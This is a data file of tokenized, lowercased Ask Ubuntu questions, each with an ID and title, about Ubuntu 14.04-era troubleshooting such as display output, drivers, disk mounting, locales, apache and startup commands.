463177	check media center status	is there any software available to check the status ( temperature , disk storage , error logs , etc ) of my media center or home server remotely through a web ui ? like transmission remote .
463179	limit the size of a folder	okay , so i was looking into doing a bit of web hosting , and was wondering how i would put a max storage limit on a folder , so that there ca n't be more than say 5gb in the one particular folder . i 've heard that i can do this via ftp perms , but i am not sure what that means . could someone show me how to put a limit on how large a folder can be ?
463180	automatically detecting and outputing to s-video at startup	after combing the internet i have developed a script that is capable of checking whether i have a monitor connected to my vga port and switching to my s-video port if not # ! /bin/bash # if no vga then enable s-video at 800x600 if [ $ ( xrandr -q| grep `` vga-0 disconnected '' ) == `` '' ] then # vga is connected do nothing else # no vga switch to s-video xrandr xrandr -- addmode s-video 800x600 xrandr -- output s-video -- set `` tv standard '' ntsc xrandr -- output s-video -- set `` load detection '' 1 xrandr -- output s-video -- right-of vga-0 -- mode 800x600 sleep 10 xrandr fi now how do i set it up to run at the correct time when i boot the computer so that it will pick my tv when there is no monitor connected .
463181	i am trying to download virtualbox , but i get a failed message	here is the fail message from vbox-install.log : dkms : failed to install using dkms , attempting to install without makefile:183 : *** error : unable to find the sources of your current linux kernel . specify kern_dir= < directory > and run make again . stop . i guess i could also ask what is a kernel ?
463182	error 404 in update commands	i am a new ubuntu user . when i run sudo apt-get update this error message appears : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/raring/main/source/sources 404 not found what to do now ?
463184	can not install ubuntu 12.04 or 14.04 on hp 380p gen8 ?	for each of the `` certified '' ubuntu distributions , the fatal error is `` grub can not be installed '' . this is an installation on a new , never used system . have followed the recommended solutions : append raid array name into : /dev/mapper fails : the interface does not allow path insertion grub-install -- root-directory=/home/ubuntu/temp /dev/sda fails : grub-install is not loaded i followed the certification instruction for the bios : *press f9 to boot into rbsu *navigate to system options - > hp dynamic smart array b320i and select disable *go to system options - > sata controller options and select legacy sata or ahci *reboot the machine and now you will be able to install the os . fails : same error edit the iso : can not edit using macos x any suggestions ?
463186	disable pupop when switching input method	after upgrading to 14.04 , when i switched input method to chinese , a popup icon showed up ( see the figure below ) . it 's a bit annoying . how can i disable it ?
463191	error message in java code	class freshjuice { enum freshjuicesize { small , medium , large } freshjuicesize size ; } public class freshjuicetest { public static void main ( string args [ ] ) { freshjuice juice = new freshjuice ( ) ; juice.size = freshjuice . freshjuicesize.medium ; system.out.println ( `` size : `` + juice.size ) ; } } i wrote this code compiled it . error : - class freshjuicetest is public , should be declared in a file named freshjuicetest.java public class freshjuicetest { ^ 1 error what the error ?
463192	several apache questions	okay , so i have several questions about apache ( 2 ) how would i automate creation of virtual hosts . i want to put in a command that would add a virtual host , that would have the document root setting edited , ( apache2 add virutalhost ( stuff here ) ) < -- something along those lines how would i change the amount of ram a site would use , if i host multiple sites , and want say `` ex1 '' to only use a max of 512mb of ram , and `` ex2 '' to use up to 1gb of ram . how would i set limits on the resources that the individual sites would use ? thanks !
463196	iced tea plugin keeps asking for permission to run java applets	every time the browser wants to load a java applet a dialog asking me for permission to run the java applet appears . no matter if i check the option `` remember this option '' or not , the dialog appears , annoyingly , every time the browser tries to show a java applet . here there 's a picture showing the phenomenon . is there any solution to this annoying permission dialog ? thanks in advance , charlie
463199	usb ( nfts ) refuses to remove read-only restriction ( ubuntu 14.04 )	a few days ago a single folder in my usb drive got damaged while using windows , since then my usb can only be mounted in read-only mode ( nfts file format ) . i 've tried using fsck and mounting the usb with the rw option without any success . i already backed up all the information from the usb , i just want to format it . ( it 's a brand new usb ) here 's what dmesg shows : [ 10785.733441 ] usb 3-3 : usb disconnect , device number 3 [ 10789.770227 ] usb 4-3 : new superspeed usb device number 7 using xhci_hcd [ 10789.787253 ] usb 4-3 : new usb device found , idvendor=1b1c , idproduct=1a0a [ 10789.787255 ] usb 4-3 : new usb device strings : mfr=1 , product=2 , serialnumber=3 [ 10789.787256 ] usb 4-3 : product : survivor 3.0 [ 10789.787257 ] usb 4-3 : manufacturer : corsair [ 10789.787258 ] usb 4-3 : serialnumber : 07083aeb1c940733 [ 10789.788317 ] usb-storage 4-3:1.0 : usb mass storage device detected [ 10789.790225 ] scsi10 : usb-storage 4-3:1.0 [ 10790.791406 ] scsi 10:0:0:0 : direct-access corsair survivor 3.0 pmap pq : 0 ansi : 6 [ 10790.794617 ] sd 10:0:0:0 : attached scsi generic sg4 type 0 [ 10790.794716 ] sd 10:0:0:0 : [ sdd ] 62554112 512-byte logical blocks : ( 32.0 gb/29.8 gib ) [ 10790.795569 ] sd 10:0:0:0 : [ sdd ] write protect is off [ 10790.795570 ] sd 10:0:0:0 : [ sdd ] mode sense : 2b 80 00 08 [ 10790.796398 ] sd 10:0:0:0 : [ sdd ] write cache : disabled , read cache : enabled , does n't support dpo or fua [ 10790.857194 ] sdd : sdd1 [ 10790.860478 ] sd 10:0:0:0 : [ sdd ] write protect is on [ 10790.860480 ] sd 10:0:0:0 : [ sdd ] mode sense : 2b 80 80 08 [ 10790.862431 ] sd 10:0:0:0 : [ sdd ] attached scsi removable dis
463200	unable to access âseagate expansion driveâ 2 t.b	i bought a seagate expansion 2tb external hard disk to use among cross platform o.s but before my use i did not bother to do any settings or mount ( if there was any or necessary ) and i plugged it in to my laptop which has ubuntu 13.10 in it . it worked fine when i did the transfer from my laptop to the external hard drive ( seagate 2 t.b ) but suddenly it shows me an error message ( screen shot below ) . in the launcher the icon appears but unable to perform any task.what do i do please suggest ? i have already transferred my entire files in it , do n't wan na lose it . and also how to do the partition so that it can be use for other o.s as well ? i am also a newbie please be detail in explaining . thanks in advance. ! [ ca n't post images so i 'm listing the errors : error mounting /dev/sdb1 at /media/koyu/seagate expansion drive : command-line `mount -t `` ntfs '' -o `` uhelper=udisks2 , nodev , nosuid , uid=1000 , gid=1000 , dmask=0077 , fmask=0177 '' `` /dev/sdb1 '' `` /media/koyu/seagate expansion drive '' ' exited with non-zero exit status 13 : $ mftmirr does not match $ mft ( record 0 ) . failed to mount '/dev/sdb1 ' : input/output error ntfs is either inconsistent , or there is a hardware fault , or it 's a softraid/fakeraid hardware . in the first case run chkdsk /f on windows then reboot into windows twice . the usage of the /f parameter is very important ! if the device is a softraid/fakeraid then first activate it and mount a different device under the /dev/mapper/ directory , ( e.g . /dev/mapper/nvidia_eahaabcc1 ) . please see the 'dmraid ' documentation for more details .
463201	xbindkeys + xdotool or xvkbd not working well	in my .xbindkeysrc i 'm trying to bind alt+l to the up arrow key : xvkbd works okay in some places , but does n't send anything at all in the terminal for example : '' xvkbd -xsendevent -text `` \ [ up ] '' '' alt + l xdotool works in the terminal , but only sends the up key once , because i had to add + release otherwise it triggers too early or something and always sends nothing : '' xdotool key -- clearmodifiers up '' alt + l + release neither of these solutions are very good . i just want j k l ; to be arrow keys while alt is down
463203	how to bind super+s to indicator applete complete ? - gnome classic	i use gnome classic , i 'm not a mouse fan . when i get an email while i 'm writing code , i i would super+s to get to the indicator-applet-complete and read it . also to write emails , or check unread instant messages . upgrading from 12.04 to 14.04 made super+s bind to applications menu rather than the indicator applet complete . i removed the binding from the applications using dconf-editor , navigating to : org- > gnome- > desktop- > wm- > keybindings and disabling ( [ 'disabled ' ] ) the panel-main-menu key . now , how do i bind super+s to the indicator applet complete ? it seems to be some how binded , since if if press super+s and then move the cursor over the applet it 'll open the drop down menus ( and it wo n't if i hover without pressing super+s ) but i do n't want to have to use the mouse ...
463205	i 'm having problems with compiz	i 'll give you an example situation-i have two windows open of program 1 , and i 'm currently active in program 2 . if i click on program 1 's icon in the launcher ( it does n't have to be pinned ) , the last window i was in while i used program 1 comes up . but if i click the icon again to switch windows , while still in the window that came up , all of windows freeze for a couple seconds , then they all show up , stacked over one another ( not like when you do super+w- which does n't work either ) , without their window decorations , and then , after a couple seconds , the windows flicker , disappear , and then they reappear , with their decorations . sometimes , if this happens too frequently ( maybe two times in ten seconds ) , the second time , the windows do not regain their decorations , and it 's stuck like that . if i have my terminal open , ( sometimes this works ) i can type in compiz and everything starts working again . if not , then i have to shut down my computer and lose all my work . i tried sudo apt-get install -- reinstall compiz , sudo apt-get purge compiz , and the same commands except with unity and ubuntu-desktop included in the reinstallation and purging . i am literally afraid to use the launcher now because of this . please help , i 'll try anything but ubuntu reinstallation by now . i 'm using ubuntu 14.04 lts and compiz 0.9.11 .
463206	is it possible to compile a kernel module under chroot ?	under a chroot environment , is it possible to build a kernel module without having the kernel installed , just the headers ? it sounds like something you would n't want to do , but in my case i do . i 've got a script that automates creating an environment for netbooting which also includes the initrd.img created by mkinitramfs and copied to the tftp server afterward . for example , if the target pc also includes a radeon card i want fglrx . if it 's nvidia i want the nvidia package . those who run/customise the build script may not have those cards installed physically into my pc .
463207	use imac 27 '' 2010 as display for lenovo t440p laptop running 14.04	i have a lenovo t440p with integrated graphics ( intel 4600 ) , and it has a mini displayport . my imac is a mid 2010 , and has the ability to accept a signal over mini displayport and display it on it 's own screen using target display mode ( tdm ) . this is known to work with windows computer and there is evidence it can work with linux . the basic idea being that it is simply working as an external monitor , so as long as you give its proper signal via mini displayport , you 're fine . but for some reason i ca n't get it to work . i follow the instructions ( linked above ) and after plugging the two together and hitting command+f2 nothing happens . i really do n't think it 's the imac that 's having issues , rather i think that ubuntu simple is n't seeing the second display , or perhaps the mini display port does n't have a proper driver . but i 'm not sure how to prove this hypothesis ... so , if anyone could possibly help me narrow this down or , even better , if you know what the missing part of the setup is ... i 'd appreciate it . i did run xrandr -q at one point to see if it saw a second display . the output seems to indicate no , but i 'm not terribly proficient at reading the output . here it is though , for the curious : xxx @ xxx-thinkpad : ~ $ xrandr -q screen 0 : minimum 320 x 200 , current 1600 x 900 , maximum 32767 x 32767 edp1 connected primary 1600x900+0+0 ( normal left inverted right x axis y axis ) 309mm x 174mm 1600x900 60.0*+ 1440x900 59.9 1360x768 59.8 60.0 1152x864 60.0 1024x768 60.0 800x600 60.3 56.2 640x480 59.9 vga1 disconnected ( normal left inverted right x axis y axis ) dp1 disconnected ( normal left inverted right x axis y axis ) hdmi1 disconnected ( normal left inverted right x axis y axis ) dp2 disconnected ( normal left inverted right x axis y axis ) hdmi2 disconnected ( normal left inverted right x axis y axis ) virtual1 disconnected ( normal left inverted right x axis y axis ) also , pursuant to other threads i 've seen around , no i 'm not using a dock with this . just the regular mini displayport on the side of the chassis .
463209	how to fix locale error	i just did a fresh install of ubuntu using debootstrap . when i do sudo aptitude upgrade , i get this error message : perl : warning : setting locale failed . perl : warning : please check that your locale settings : language = `` en_us : en '' , lc_all = ( unset ) , lang = `` en_us.iso-8859-1 '' are supported and installed on your system . perl : warning : falling back to the standard locale ( `` c '' ) . locale : can not set lc_ctype to default locale : no such file or directory locale : can not set lc_messages to default locale : no such file or directory locale : can not set lc_all to default locale : no such file or directory can someone please tell me how to resolve this issue ? i see a lot of postings similar to this online but none of them seems to resolve the problem . i am using ubuntu 14.04 lts . thanks . fyi : $ locale -a c c.utf-8 en_ag en_ag.utf8 en_au.utf8 en_bw.utf8 en_ca.utf8 en_dk.utf8 en_gb.utf8 en_hk.utf8 en_ie.utf8 en_in en_in.utf8 en_ng en_ng.utf8 en_nz.utf8 en_ph.utf8 en_sg.utf8 en_us.iso88591 en_us.utf8 en_za.utf8 en_zm en_zm.utf8 en_zw.utf8 posix and $ locale lang=en_us.iso-8859-1 language=en_us : en lc_ctype= '' en_us.iso-8859-1 '' lc_numeric= '' en_us.iso-8859-1 '' lc_time= '' en_us.iso-8859-1 '' lc_collate= '' en_us.iso-8859-1 '' lc_monetary= '' en_us.iso-8859-1 '' lc_messages= '' en_us.iso-8859-1 '' lc_paper= '' en_us.iso-8859-1 '' lc_name= '' en_us.iso-8859-1 '' lc_address= '' en_us.iso-8859-1 '' lc_telephone= '' en_us.iso-8859-1 '' lc_measurement= '' en_us.iso-8859-1 '' lc_identification= '' en_us.iso-8859-1 '' lc_all=
463211	deleting and formatting partition	so , i just deleted the xp partition on my hard-drive , and now have 30 gb of extra space . but that space isnt being used by my ubuntu file-system , and i 'm getting warnings that there is only about 200 mb of space left , even though i have the empty 300 gb partition so , my question is how do i connect the two partitions and allow ubuntu to use the 30gb ?
463213	`` exec : gnome-session : not found '' when login using ligthdm	on login the password is accepted but it returns back to the login screen . tried multiple times even after reboot ... same behavior . i had left my laptop ( lenovo ideapad z510 ) in suspend mode ( lid down ) last night , but it did not resume this morning , as it usually does . it had shutdown or crashed , and on booting with ubuntu the login failure mentioned above started . cat ~/.xsession-errors /usr/sbin/lightdm-session : 1 : /usr/sbin/lightdm-session : ls : not found /usr/sbin/lightdm-session : 104 : exec : gnome-session : not found okay . i 've tried a bunch of suggestions from ubuntu gets stuck in a login loop changed 'id ' to '/usr/sbin/id ' in /etc/profile removed .xauthority removed /tmp removed , purged and re-installed lightdm checked .profile for syntax errors ( source .profile worked fine , so i guess no syntax errors ) nothing worked . my guest login is working fine , so another user should also work . i 'm now going to create another user and continue working , but a solution to this problem is still warranted ... its likely going to repeat in future . installing and reconfiguring gdm also did not work . sudo apt-get install gdm
463214	`` safely remove '' option for external devices removed from ubuntu 14.04 ?	i noticed that with 14.04 , the option `` safely remove '' is no longer there with external hdd 's or flash drives . it just says `` eject '' now . is eject and safely remove now consolidated into one option , making `` eject '' safe to use ?
463217	all subfolders in home folder are being copied to desktop & deletion in from one place causes deletion from both places	all sub folders in home folder like `` videos , pictures '' etc are being automatically copied to desktop & deletion of a folder say `` videos '' from desktop also deletes from home folder and vice-versa and desktop folder is missing from home folder .
463218	masquerade username and hostname in sendmail	how do i configure sendmail to masquerade my username ? what files would i need to edit ? i would like to change all instances of justin @ foobar.org to other_user @ foobar.org and change the hostname : received : from justin-thinkpad-w530 ( [ ipaddress ] ) here is the full header from the gmail recipient . received : by 10.60.51.167 with smtp id l7csp276770oeo ; thu , 8 may 2014 22:26:07 -0700 ( pdt ) x-received : by 10.66.120.201 with smtp id le9mr15663178pab.98.1399613167500 ; thu , 08 may 2014 22:26:07 -0700 ( pdt ) return-path : < justin @ foobar.org > received : from justin-thinkpad-w530 ( [ ipaddress ] ) by mx.google.com with esmtps id va4si638957pac.13.2014.05.08.22.26.06 for < justin_133 @ gmail.com > ( version=tlsv1.2 cipher=ecdhe-rsa-aes128-gcm-sha256 bits=128/128 ) ; thu , 08 may 2014 22:26:07 -0700 ( pdt ) received-spf : none ( google.com : justin @ foobar.org does not designate permitted sender hosts ) client-ip= ; authentication-results : mx.google.com ; spf=neutral ( google.com : justin @ foobar.org does not designate permitted sender hosts ) smtp.mail=justin @ foobar.org received : from justin-thinkpad-w530 ( foobar.localdomain [ 127.0.0.1 ] ) by justin-thinkpad-w530 ( 8.14.4/8.14.4/debian-4.1ubuntu1 ) with esmtp id s495q4w9007925 for < justin_133 @ gmail.com > ; thu , 8 may 2014 22:26:05 -0700 received : ( from justin @ localhost ) by justin-thinkpad-w530 ( 8.14.4/8.14.4/submit ) id s495q4oq007911 ; thu , 8 may 2014 22:26:04 -0700 date : thu , 8 may 2014 22:26:04 -0700
463221	joinme not working fully on ubuntu 14.04	i have ubuntu 14.04 . i have installed join me with the help of wine . i am able to start join me session on my laptop . people can join it . i am able to exchange message and files with them on the join me session . however they are not able to see my screen . note : when anyone else share their screen using join me . i am able to see it . has anyone come across this ? thanks lokendra kushwah
463227	'uboot-mkimage ' has no installation candidate ?	i 'm using 13.10,64 bit . i 'm trying to install mkimage but it is not working . root @ pnreddy : /home/pnreddy/android_13.04 # sudo apt-get install u-boot-tools reading package lists ... done building dependency tree reading state information ... done u-boot-tools is already the newest version . 0 upgraded , 0 newly installed , 0 to remove and 0 not upgraded . after that i tried to install some packages for android.then i 'm getting following errors . root @ pnreddy : /home/pnreddy/android_13.04 # sudo apt-get install git-core gnupg flex bison gperf build-essential zip curl zlib1g-dev libc6-dev lib32ncurses5-dev x11proto-core-dev libx11-dev lib32z1-dev libgl1-mesa-dev g++-multilib mingw32 tofrodos python-markdown libxml2-utils xsltproc uboot-mkimage openjdk-6-jdk openjdk-6-jre vim-common reading package lists ... done building dependency tree reading state information ... done package uboot-mkimage is not available , but is referred to by another package . this may mean that the package is missing , has been obsoleted , or is only available from another source however the following packages replace it : u-boot-tools : i386 u-boot-tools e : package 'uboot-mkimage ' has no installation candidate how can install mkimage ?
463231	ubuntu 14.04 music directory missing from home directory and submenu	recently i upgraded from 12.04 to 14.04 and i do n't see music submenu and music directory on opening home directory.i also checked in .config user-dirs.dirs and i found xdg_desktop_dir= '' $ home/desktop '' xdg_download_dir= '' $ home/downloads '' xdg_templates_dir= '' $ home/templates '' xdg_publicshare_dir= '' $ home/public '' xdg_documents_dir= '' $ home/documents '' xdg_music_dir= '' $ home/ '' xdg_pictures_dir= '' $ home/pictures '' xdg_videos_dir= '' $ home/videos '' on editing xdg_music_dir= '' $ home/music '' i get the music submenu but music directory missing from home directory.and on clicking music sub menu getting error unable to find the requested file . please check the spelling and try again . unhandled error message : error when getting information for file '/home/pankaj/music ' : no such file or directory please help me solve this problem ... ..
463232	wifi not working on toshiba satellite c875 - s7103 laptop in ubuntu 14.04 lts 64bit	hello i recently installed ubuntu 14.04 on my toshiba laptop and can not get the wifi working to save my life so far i have tried going to software & updates and checking for additional drivers and nothing shows up even if i plug into ethernet and repeat the process still nothing i have also tried running a few terminal commands and got no were fast with that my laptops wifi card is as followed bellow realtek rtl8188ce wireless lan 802.11n pci-e nic if there is anything else you need to know feel free to ask thank you for your time in this matter : )
463236	java : plugin install for freemind , get : noclassdeffounderror org/objectweb/asm/opcodes	i am using freemind 0.9 on ubuntu 12.04 , and trying to install a plugin written with `` groovy '' , from http : //blog.icare3d.org/2011/02/writing-phd-thesis-using-freemind-and.html i installed freemind , freemind-plugins-script , put manually ( and edited ) the grrovy srcipt , edited plugins/scriptingengine.xml as described in the link . the plugin is recognised as i can access through the menu , but clicking on it has no effect . i realise in the terminal there is an error : stderr : exception in thread `` awt-eventqueue-1 '' stderr : java.lang.noclassdeffounderror : org/objectweb/asm/opcodes stderr : at java.lang.classloader.defineclass1 ( native method ) stderr : at java.lang.classloader.defineclass ( classloader.java:643 ) stderr : at java.security.secureclassloader.defineclass ( secureclassloader.java:142 ) stderr : at java.net.urlclassloader.defineclass ( urlclassloader.java:277 ) stderr : at java.net.urlclassloader.access $ 000 ( urlclassloader.java:73 ) my understanding is that i am missing a java component ? is this correct ? or is it that that component is not updated ( i note i have grrovy 1.9 while 2.3 seems there ) ? if so , how can i locate it ? i saw some libasm-java libraries , installed a bunch of them ( libasm-dev , libasm-java , libasm1 , libasm2-java , libasm2-java , libasm3-java ) but still the same error . interestingly , i note that objectweb/asm/opcode is mentioned in libasm2-java-doc but not in libasm2-java or maybe the library is correctly installed , but it is the plugin/freemind that does not locate it correctly ? as i do n't know anything about java , any hint would be most appreciated ! thanks ! !
463237	change home folder to another already existing folder	i was using ubuntu 12.04 for some time and yesterday i upgraded to ubuntu 14.04 . so when i was using 12.04 my home was named `` sen '' and now after upgrading to 14,04 , a new home was created with name `` navaneeth '' . i have all my setting and configs in my previous folder `` sen '' and now i want to change the home folder name and user name back to `` sen '' . please guide me on how to do this . nb : i have also found that i have lost all my previous softwares .
463238	how to run command at startup ?	the return key in my keyboard is broken , so i have chosen to make my pgdn key to act like the return key . now i learned how to do this using 'xmodmap ' . the command i have to run is : xmodmap -e 'keycode 117 = return' but i have to run this command everytime i reboot . i googled around and found that placing this command in the /etc/rc.local file should run it automatically at start-up . however , it does not work . can anyone tell me how can i execute this command when i boot up ? i am using ubuntu 14.04 .
463240	ubuntu 14.04 lts 64 - bit not working on bootable usb	hello i went to download ubuntu 14.04 lts 64-bit and went to make my bootable usb and followed the steps and everything correctly and the usb showed install ubuntu but when i went to setup my laptop and disable safe boot and change the usb to first in the boot order it keeps telling me there is no bootable image/file or something along those lines like was there something i missed or did n't do or is there a problem that people have been experiencing when downloading ubuntu 32-bit/64-bit like it being a damaged download or whatever any help would be greatly appreciated as i am new to ubuntu and the forums and would love to learn from you more experienced folks and become more knowledgeable with the ubuntu linux os
463241	full automatic scheduled download in lubuntu	as the question said , i want to schedule daily download at night -when i 'm absent- i 've doing this in past ( windows xp ) by using wake up feature in bios and in idm set schedule task and when arrived at 7 o clock it was stopping download and then turn off pc . i want to do same thing in lubuntu . also i have been tried to set uget apt in lubuntu 's startup but it does n't work . the way i tried to add uget in startup is make a uget.desktop in ~/.config/autostart/ . and set chmod to 777 . and i do n't know how to configure uget to do the same thing as idm in xp . thanks .
463243	how to uninstall or remove hadoop from ubuntu ?	i have installed hadoop-2.4.0 in my system ( 14.04 ) , i want to remove it completely and reinstall it . if i have delete the configured folder hadoop , is it enough to remove hadoop in my ubuntu 14.04 lts .
463245	why is inserted media loaded under user directory ?	case in point : i insert an sd card named testsd into my computer , it loads to /media/user/testsd instead of /media/testsd so far this only happened on two installs on different machines with xubuntu 14.04 my other prior xubuntu ( lts 12.04 ) does the latter example , and i have written bash scripts using same . when i tried my scripts , i got errors no such file or directory . was this an intentional change for new file structure , or a bug causing wrong assignment of inserted media ? would like to know before rewriting scripts to match the system , although i was trying to write scripts that were universal in nature to be run on any system not just the current one . i have currently three flavors of ubuntu : ubuntu 12.04 lts ( on 2 machines ) , xubuntu 12.04 lts , and xubuntu 14.04 ( on 2 machines setting them up ) . both ubuntu and xubuntu 12.04 give me /media/testsd , while xubuntu 14.04 has /media/user/testsd . any input would be helpful .
463246	how to avoid a minimized window when switching applications ( alt+tab ) ?	when i minimize a window , normally i want to avoid it for a while . that 's why i minimize it in the first place : ) but in ubuntu whenever i do it and use alt+tab to switch applications , that minimized windows is the first option when it should be the last or something . is it possible to change this behaviour ?
463247	curl request not working	can some help me out in this. ? i tried making a curl to random web pages it works fine . this address mentioned below i tried via browser it also works but when i try this via shell it does not work . curl -x get `` http : //address:8000/file_search/ ? username= $ param & file_list= $ list ''
463248	reinstalling network manager & icon issues	i just updated to ubuntu 14.04 lte and network manager is giving me a question mark in my system tray even though i can connect to the internet . this really irritates me . i tried hiding network manager in system and and making it reappear to see if it would reset but it has n't . i also tried switching themes and rebooting system to see if it would reset icons , but this does n't work either ... i 'm out of ideas so i was thinking of reinstalling network manager ... my question : if i reinstall or remove network manager , can my computer still connect to the internet or not ? i dont want to uninstall it and then not have internet to redownload it again . i 'd appreciate some info on the proper procedure for this . can i just do sudo aptitude reinstall network-manager ? thanks . edit i also deleted the cache folder ( /var/tmp/kdecache- $ user/ ) and rebooted my system . this also did not work . moreover , if i click on network manager icon in system tray , there 's an icon in the middle with bars which is grayed out . does anyone know what that means ? i ca n't click on it for some reason ... do you have to have network-manager package to have internet working ? i wanted to try and uninstall/reinstall it but was n't sure if i would be able to if i did as i thought it might be required for internet to work .
463249	installing printer samsung ml-1860 with xubuntu 14.04 ?	having problem with installing printer samsung ml-1860 wiht xubuntu 14.04. rastertosplc file missing in cups/filter directory .
463251	how to replace windows 7 with ubuntu 12.04 in c drive without affecting other partitions	in my pc ( 2 gb ram , 160 gb hdd ) i have windows 7 in partition c ( 20 gb ) . i have tried ubuntu 12.04 from live usb . i now want to replace windows 7 with ubuntu 12.04 in the same c partition without affecting the other partitions and their contents . i have read the answer to a similar question but still do not feel confident . like in that question , i too have proceeded till `` something else '' , but then precisely what steps should i take ? is it possible to simply choose the c partition and start installing ubuntu there ? in that case what other choices should i make ?
463256	quad monitors work as mirror displays but not as extended	so i gave up on fglrx driver due to unsupported gpus now i 'm on regular radeon drivers with 4 monitors on 14.04 . i got them all to work perfectly fine with all settings/displays mirror mode but when if i try to uncheck mirrored display i get `` the selected configuration for displays could not be applied/could not set the configuration for crtc 64 '' pop up error and either both monitors 3 & 4 just freeze with last image , or 3 works but 4 just goes black with no signal $ sudo lspci -nn | grep vga 01:00.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] rv630 xt [ radeon hd 2600 xt ] [ 1002:9588 ] 04:00.0 vga compatible controller [ 0300 ] : advanced micro devices , inc. [ amd/ati ] rv630 xt [ radeon hd 2600 xt ] [ 1002:9588 ] and $ sudo lshw -c video *-display description : vga compatible controller product : rv630 xt [ radeon hd 2600 xt ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0 bus info : pci @ 0000:01:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:46 memory : c0000000-cfffffff memory : fe6e0000-fe6effff ioport : a000 ( size=256 ) memory : fe6c0000-fe6dffff *-display description : vga compatible controller product : rv630 xt [ radeon hd 2600 xt ] vendor : advanced micro devices , inc. [ amd/ati ] physical id : 0 bus info : pci @ 0000:04:00.0 version : 00 width : 64 bits clock : 33mhz capabilities : pm pciexpress msi vga_controller bus_master cap_list rom configuration : driver=radeon latency=0 resources : irq:47 memory : d0000000-dfffffff memory : fe9e0000-fe9effff ioport : d000 ( size=256 ) memory : fe9c0000-fe9dffff more info $ sudo xrandr screen 0 : minimum 320 x 200 , current 7680 x 1200 , maximum 8192 x 8192 dvi-0 connected primary 1920x1200+0+0 ( normal left inverted right x axis y axis ) 519mm x 324mm 1920x1200 60.0*+ 1600x1200 60.0 ... more resolutions ... din disconnected ( normal left inverted right x axis y axis ) dvi-1 connected 1920x1080+1920+0 ( normal left inverted right x axis y axis ) 531mm x 299mm 1920x1080 60.0*+ 50.0 59.9 1920x1080i 60.1 50.0 60.0 ... more resolutions ... dvi-1-2 connected 1920x1080+3840+0 527mm x 296mm 1920x1080 60.0*+ 50.0 59.9 30.0 30.0 1920x1080i 60.1 50.0 60.0 ... more resolutions ... din-1-1 disconnected dvi-1-3 connected 1920x1080+5760+0 527mm x 296mm 1920x1080 60.0*+ 50.0 59.9 30.0 30.0 1920x1080i 60.1 50.0 60.0 ... more resolutions ... 1920x1080 ( 0x45 ) 148.5mhz h : width 1920 start 2008 end 2052 total 2200 skew 0 clock 67.5khz v : height 1080 start 1084 end 1089 total 1125 clock 60.0hz ... more resolutions ... edit ati card with radeon driver , anyone ?
463259	is there a way to prevent crash report uploads monopolizing network connection ?	i have experienced a few crashes on 14.04 and have selected the option to send crash report . once the upload starts , my browser and mail client fail to connect to the network until crash upload completes . it seems the uploads monopolize the connection . as upload speeds are relatively low , i can experience several minutes with no browser/mail access . is there maybe some way to lower priority of upload so concurrent network access is possible ?
463260	how to iterate a python dictionary with tuples ?	i have the following dictionary : zimmerliste = { 'bad_eg ' : ( ( 5,2 ) , ( 5,2 ) , ( 5,2 ) , ( 40 , .05 ) ) , 'gang_eg ' : ( ( 7,2 , ) , ( 40,1.5 ) ) } the key is a room in my house . the dictionary contains a tuple of a tuple . each inside tuple contains a wattage number ( of a lamp ) and how long it will burn per day . i now want to have the wattage sum per room . this code of my room-object does n't work : def watt_pro_zimmer ( self ) : . iterator = 0 for x in zimmerliste : for tup in zimmerliste [ x ] : iterator += tup [ 0 ] return iterator where 's my error and is there an easier way ?
463261	xfig turkish characters are missing when texting	i 'm using xfig for figures in my papers . i considered that turkish ( latin5 ) or other characters are missing except english . anybody knows how to add them in ubuntu ?
463265	acces to the `` burn : /// '' directory from the terminal ?	how can i acces the `` burn : /// '' directory from the terminal on xubuntu 14.04 . is there an integrated option to burn the whole content to the disk without open xfburn ( it does n't show the `` burn : /// '' directory ) ?
463267	screen scrolls down on it 's own	i have the latest ubuntu version and i 'm on a laptop . every window screen i open seems to always scroll down by it 's self , as if the down arrow is being pressed or the pgdn key . it 's not a virus because i put a new hard drive in it and it still does it . i have not spilled anything on the keyboard either . how do a stop it or how do i disable my host keyboard .
463268	installing cloudera on ubuntu 14.04 lts	i am trying to install cloudera on ubuntu 14.04 lts . can somebody please let me know when can cloudera will release support for ubuntu 14.04 ?
463272	running graphical program on ubuntu via mac osx terminal - keep program running ?	i 'm having problems knowing whether a program is running in the background . the program is run via command line , but the computer is just a server ( apologies if terminology is incorrect ) , which we access using our own computer 's command line . in this instance , i am using my mac 's terminal to run the program , which can take 20 hours or so . i 've read the forums on the use of nohup and & to keep this process running , even when i disconnect by closing terminal , or putting my laptop on sleep - however , it does n't seem to work . this is only an assumption - using htop , i checked to see whether the process was running , but found that it was n't there . it may be the initial command that is n't working . this is currently what i type : nohup recon-all -all -s & ( `` recon-all -all -s '' being the command ) this does n't start the process , but generates a nohup.txt file in the directory that i was currently in . only when i remove nohup from the command does it work . i was wondering if anybody has any ideas about how i get this process to run ? is it a problem of the command ? any help would be much appreciated .
463274	kde open recently closed application	how do i open application , that i have recently closed in kubuntu ? upd it would be great to have keyboard shortcut for this action . upd2 i mean reopen last closed application , similar to ctrl+shift+t in google chrome , wich reopens last closed tab .
463276	installing proprietary nvidia driver for geforce 9600 gt on ubuntu 14.04	i would like to use cuda on my ubuntu machine with the graphics card nvidia geforce 9600 gt . installing cuda is no problem but in order to run any cuda code i need to install the proprietary nvidia driver as well . i did so by choosing an appropriate one ( for example , 331 ) from the list popping up in the `` additional drivers '' menu . the installation works just fine but whenever i reboot the system all i see is a black screen with a blinking cursor . after purging all nvidia related stuff ( sudo apt-get remove -- purge nvidia* ) , i 'm able to use the system again after rebooting . i read somewhere that this problem might be related to the fact that i have to use dvi instead of vga as there are no other output ports on the card . however , switching from one dvi output port to another does n't help either . any help is greatly appreciated .
463278	ca n't get the unity menu launcher displayed on the desktop when using a login account	after installing from disk ubuntu 13.10 it successfully upgraded online to ubuntu 14.04 but i 'm finding that i can only get the unity gui ( with its launcher menu access to firefox etc ) by using the guest session account , not the administrator ( login only ) account that was created when ubuntu was installed on my pc . nor can i create a standard account that would also ( for example ) allow me to access my hard drive or bookmark firefox webpages ( which the guest account does not allow ) . can anyone suggest how to get the unity menu launcher displayed on the desktop when using an administrator or standard ( login ) account ?
